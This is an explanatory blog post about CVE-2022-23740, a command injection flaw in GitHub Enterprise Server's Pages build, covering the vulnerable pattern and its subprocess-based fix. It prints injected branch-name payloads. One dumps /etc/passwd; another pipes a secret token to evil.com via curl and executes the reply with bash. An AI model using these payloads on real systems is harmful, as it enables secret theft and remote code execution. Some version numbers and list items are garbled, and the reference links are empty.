In early 2022, cybersecurity researchers discovered a critical vulnerability in GitHub Enterprise Server (GHES). Identified as CVE-2022-23740, this flaw made it possible for attackers to run unauthorized system commands—Remote Code Execution (RCE)—by exploiting a command injection bug in the GitHub Pages build process. Although the vulnerability affected only version 3.7. of GHES and was quickly patched in version 3.7.1, its exploitation could have had a devastating impact on organizations relying on self-hosted GitHub services.
This post breaks down CVE-2022-23740 in simple terms, shows you how it works with illustrative code, and provides links to trusted references. We’ll explain how an attacker could have abused this flaw, the requirements for exploitation, and what steps to take to stay protected.
Overview: What Was the Problem?
- Vulnerability type: Improper neutralization of argument delimiters in a command (command injection)
Patched version: 3.7.1
- Discovered via: GitHub Bug Bounty Program
- Requirements for attack: Attacker must be able to create and build a GitHub Pages site using GitHub Actions on the vulnerable server.
On vulnerable systems, certain arguments passed to a command were not properly sanitized. This allowed crafty attackers to sneak in extra instructions, effectively hijacking the underlying shell and executing their own commands.
1. Setting the Scene
GitHub Pages lets users build and deploy static websites directly from source repositories. On GHES, this process can use GitHub Actions, which runs in a privileged context. During the build, user-controlled input (like a repository or branch name) could end up in a shell command without proper escaping.
Suppose somewhere in the GHES code, a shell command is assembled like this (in pseudocode)
import os
branch_name = user_input # This value comes from untrusted user data
cmd = f"build_pages --source={branch_name}"
os.system(cmd)
If an attacker can control branch_name, they could input something malicious such as
main; cat /etc/passwd
Now, the built command would become
build_pages --source=main; cat /etc/passwd
build_pages --source=main
- cat /etc/passwd (which would dump sensitive system info)
Let's say the repository allows branches named by users. The attacker creates a branch named
main; curl http://evil.com/$(cat /etc/ghes/secret_token) | bash
Any command that uses this branch name without proper quoting executes both the build and the attacker's code.
Pseudo-exploit snippet
# Attacker creates a malicious branch
git checkout -b "main; curl http://evil.com/$(cat /etc/ghes/secret_token) | bash"
# This eventually feeds into:
# build_pages --source=main; curl http://evil.com/$(cat /etc/ghes/secret_token) | bash
In real scenarios, the attacker could gain access to sensitive files, plant backdoors, or disrupt server operations.
What Was the Fix?
GitHub patched this issue in GHES 3.7.1 (release notes) by properly sanitizing input and avoiding string concatenation when executing commands. Instead, using secure patterns like passing arguments as a list to subprocess calls, e.g.:
import subprocess
branch_name = sanitize(user_input) # Ensures no dangerous characters
subprocess.run(["build_pages", "--source", branch_name])
This approach ensures user input can't break out of the argument and inject new commands.
Am I At Risk and What Should I Do?
- Vulnerable? You’re only at risk if you’re running GitHub Enterprise Server 3.7. and allow users to create/build GitHub Pages using Actions.
3. Audit custom scripts and plugins for injection risks.
4. Follow GitHub's security advisories.
GitHub Security Advisory for CVE-2022-23740:
GitHub Enterprise Server Release Notes (3.7.1):
CVE Details:
GitHub Bug Bounty program:
Closing Thoughts
CVE-2022-23740 shows how a small oversight in handling user input can lead to full-blown system compromise—even in big enterprise products. Whenever you’re dealing with shell commands and user data, always sanitize and validate your input. If you run GitHub Enterprise Server, make sure you’re patched up and keep an eye on future advisories.
Stay safe—and share this with anyone you know relying on GitHub Enterprise Server!
Timeline
Published on: 11/23/2022 18:15:00 UTC
Last modified on: 11/30/2022 18:11:00 UTC